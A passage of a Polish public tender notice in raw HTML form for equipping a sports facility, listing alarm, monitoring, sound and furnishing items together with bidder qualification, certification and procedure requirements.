Monitor LCD 24"	szt	129.6. Kamera IP tuleja 1/3" szt	229.7. Kamera IP tuleja 1/2.8" szt	229.8. Instalacja i uruchomienie systemu monitoringu	szt	129.9. Centrala alarmowa	szt	129.10. Manipulator	szt	129.11. Sygnalizator	szt	229.12. Antena GSM	szt	129.13. Obudowa	szt	129.14. Transformator	szt	129.15. Akumulator	szt	129.16. Czujnik ruchu	szt	1029.17. Uchwyty do czujek	szt	1029.18. Instalacja i uruchomienie systemu alarmowego	szt	129.19 Fotel obrotowy -szt. 129.20 Biurko prostokątne na 4 nogach	szt	129.21. Szafa z drzwiami płytowymi uchylnymi - szt. 1 30.0. Tabliczki i piktogramy30.1. Tabliczki informacyjne szt	2430.2. Piktogramy prostopadłe szt	530.3. Piktogram na drzwi	kpl	3 31.0. Nagłośnienie - hala sportowa pom. 0/331.1. Zestaw głośnikowy dwudrożny	szt	731.2. Wzmacniacz pętli indukcyjnej 150 W , pętla indukcyjna	szt	131.3. Wzmacniacz miksujący	szt	131.4. Uchwyt montażowy do szafy rack szt	131.5. Wzmacniacz mocy jednokanałowy	szt	131.6. Zestaw z nadajnikiem miniaturowym i mikrofonem nagłownym kpl	131.7. Zestaw z mikrofonem do ręki - kpl. 131.8. Akcesoria montażowe dla 2 odbiorników w racku (bez kabli)	kpl. 131.9. Szafka mobilna - szt. 131.10. Montaż urządzeń w szafach Rack - szt. 131.11. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 32.0. Nagłośnienie - hol pom. 0/232.1. Cyfrowy wzmacniacz mocy 4 x 125W (100V). szt	132.2. Odtwarzacz CD/USB/Bluetooth	szt	132.3. tablet do sterowania + punkt dostępowy wi-fi	szt	132.4. Szafka wisząca wraz z osprzętem	szt	132.5. Zestaw głośnikowy sufitowy dwudrożny koaksjalny z kopułą. kpl	232.6. Montaż urządzeń w szafach Rack	kpl	132.7. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 33.0. Nagłośnienie - sala korekcyjna pom. 1/1 33.1. Zestaw głośnikowy sufitowy dwudrożny koaksjalny z kopułą. kpl	233.2. Mikser ścienny	szt	133.3. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 34.0. Nagłośnienie - sala fitness pom. 1/634.1. Zestaw głośnikowy sufitowy dwudrożny koaksjalny z kopułą. kpl	434.2. Mikser ścienny - szt. 134.3. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 35.0. Nagłośnienie - silownia pom. 1/1035.1. Zestaw głośnikowy sufitowy dwudrożny koaksjalny z kopułą	kpl	435.2. Mikser ścienny	szt	135.3. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 36.0. Nagłośnienie - sala spining 1/1536.1. Zestaw głośnikowy sufitowy dwudrożny koaksjalny z kopułą	kpl	236.2. Mikser ścienny	szt	136.3. Uruchomienie na obiekcie ze sprawdzeniem okablowania	kpl	1 37.0. Lustra 37.1. Pom. 1/6 - sala fitness:Lustro bezpieczne #4 na płycie wiórowej - szt	237.2. Pom. 1/15 - sala spining:Lustro bezpieczne #4 na płycie wiórowej - szt	137.3 Pom. 1/10 - siłownia:Lustro bezpieczne #4 na płycie wiórowej - szt	337.4. Pom. 1/4 - sanitariat:Lustro bezpieczne #4, klejone bezpośrednio do ściany - szt	137.5. Pom. 0/18 i 1/5 - sanitariaty dla niepełnosprawnych:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	237.6. Pom. 0/5 - sanitariat damski:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	137.7. Pom. 0/6 - sanitariat męski:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	137.8. Pom. 0/9 - sanitariat:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	137.9. Pom. 1/12 - sanitariat:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	137.10. Pom. 0/21 - sanitariat:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	137.11. Pom. 1/11 i 1/13 - sanitariat:Lustro bezpieczne #4, klejone bezpośrednio do ściany	szt	237.12. Montaż luster	szt	16 38. Ogrodzenie systemowe - 25 przęseł L-2500 kpl	139.0. Odbojniki 39.1. Odbojniki okienne - sala 1/1 i 1/6 -szt. 439.2. Odbojniki drzwi zewnętrznych - kształt półkula	szt	439.3. Odbojniki drzwi wewnętrznych - kształt półkula	szt	1240. Fototapeta lateksowa - 11,5m2</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">37400000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31711200-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37420000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44112200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45432120-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37535291-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39190000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39100000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421153-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32321200-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-09-11</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2017-09-11</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca, w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwa zamówienia, o wartości nie niższej niż 900.000,00 (dziewięćset tysięcy) zł brutto każde, obejmujące dostawę wraz z instalacją wyposażenia obiektu sportowego, składającego się co najmniej z: wyposażenia boiska, trybun, nawierzchni sportowej, w tym przynajmniej jedno obejmowało dostawę wraz z instalacją podłogi sportowej o wartości minimum 120.000,00 (sto dwadzieścia tysięcy) zł brutto. W przypadku wykonawców występujących wspólnie warunki te mogą być spełnione łącznie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">wykaz dostaw wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">dla sprzętu i wyposażenia wskazanego w § 1 ust. 3 SIWZ oraz załączniku nr 1b do SIWZ: 1) w poz. 1.1. - 1.6, 2.1, 2.4.-2.9, 3.1., 3.4-3.6, 4.1, 4.4.-4.6., 5.1., 5.2. 6.1-6.4, 7.6, 8.1-8.2., 9.1., 10.1.-10.3, 13.1-13.13, 14.2, 14.4, 15.2, 17.1. - certyfikat uprawniający do oznaczenia wyrobu znakiem bezpieczeństwa B, lub certyfikat zgodności z normą wydany przez jednostkę akredytowaną przez Polskie Centrum Akredytacji,2) w poz. 1.7, 2.3, 3.2, 3.3., 3.7.,4.2-4.3, 4.7, 5.3, 6.5, 7.3-7.4, 11.1-11.3, 12.1-12.4, 13.14-13.22, 14.1, 14.3, 16.1, 19.1, 19.2., 21.2-21.4, 23.1-23.7, 24.1, 24.3. 24.5-24.7, 25.1-25.3, 25.7, 26.8, 26.9, 27.1-27.3, 27.8, 27.9, 27.11, 27.12, 28.1, 28.2, 29.1-29.7, 29.9.-29.17, 31.1-31.9., 32.1-32.5, 33.1, 31.2, 34.1, 34.2, 35.1, 35.2, 36.1, 36.2, 37.1- 37.11, 38.1 - deklaracja zgodności, 3) w poz. 5.1 - certyfikat Międzynarodowej Federacji Piłki Ręcznej (IHF), 4) w poz. 7.1, 7.2, 7.5. - certyfikat Międzynarodowej Federacji Tenisa Stołowego (ITTF),5) w poz. 8.1, 9.1 - sprawozdanie z badań odporności na zapalenie zawieszonych pionowo tekstyliów i folii,6) w poz. 15.1 - atest PZH7) w poz. 15.1 - raport klasyfikacyjny zachowania się podczas spalania8) w poz. 18.1. - certyfikat wydany przez niezależną jednostkę badawczą potwierdzający zgodność paneli wspinaczkowych z normą PN-EN 12527, badanie na zapalność potwierdzające klasę palności minimum C-s2,d0 na gotowy produkt zgodnie z normą PN-EN 13501-1+A1:20109) 20.1 - certyfikat wydany przez niezależną jednostkę badawczą potwierdzający zgodność z normą PN EN- 14904, karta katalogowa lub specyfikacja techniczna, raport z klasyfikacji trudnopalności przy zastosowaniu na podłożu z płyt wiórowych, Deklaracja właściwości użytkowych DOP, Certyfikat ekologiczny ,,Der Blaue Engel" lub równoważny certyfikat środowiskowy10) 25.4, 26.2, 28.3, 29.21 - certyfikat wydany przez niezależną jednostkę badawczą potwierdzający zgodność z normą PN EN - 14073-211) 25.4, 26. 2, 26. 3, 26.5, 27.4, 27.5, 28.3, 28.4, 28.5, 29.20, 29.21 - atest higieniczny na cały mebel lub linię meblową12) 25.5 - sprawozdanie z badań wytrzymałościowych w zakresie bezpieczeństwa użytkowania13) 25.6, 27.6, 27.7, 28.4 - atest wytrzymałościowy potwierdzający spełnianie wymagań norm PN EN 1728, PN EN 102214) 26.3, 26.5, 27.4, 29.20 - atest wytrzymałościowy potwierdzający spełnianie wymagań norm: PN EN 527-1, 527-215) 26.4, 26. 5, 29.19 - atest wytrzymałościowy potwierdzający spełnianie wymagań norm: PN EN 133516) 26.6 - atest wytrzymałościowy potwierdzający spełnianie wymagań norm: PN EN 16139, 102217) 27.5, 28.5 - atest lub certyfikat potwierdzający spełnianie wymagań z normą PN EN 1613918) 26.3, 27.4, 28.4, 29.20 - dokument potwierdzający spełnienie wymogów wynikających z Rozporządzenia MPiPS z 1 grudnia 1998 w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz.U. Nr 148,poz.973)</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">W terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy Pzp, wykonawca zobowiązany będzie do przekazania zamawiającemu oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 